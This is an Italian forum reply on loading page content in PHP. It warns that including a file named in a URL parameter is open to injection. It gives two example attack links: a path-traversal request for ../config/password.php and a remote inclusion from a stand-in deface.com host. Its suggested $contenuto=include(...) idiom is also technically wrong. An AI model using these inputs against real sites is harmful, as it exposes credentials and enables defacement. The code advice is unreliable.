Originariamente inviato da LinkShadow
Ti ringrazio moltissimo per la risposta.

Non ci sarebbe un modo alternativo all' aggiungere in ogni pagina

Codice PHP:
<?php  $contenuto="...";   ?>
visto che ho bisogno solo di $contenuto ?
Certo.
In ongi pagina metti solo l'html.

Poi per richiamarla fai:

Codice PHP:
$contenuto=include("./file.html"); 
Veniamo ora alla injection:
tu ricevi il link: localhost/index.php?pg=casa.php
Allora includi la pagina casa.php.


Allora io posso mandarti un link malevolo per vedere file che tu non vorresti farmi vedere:
localhost/index.php?pg=../config/password.php

Oppure, se il server web non è configurato a dovere:
localhost/index.php?pg=http://www.deface.com/index.html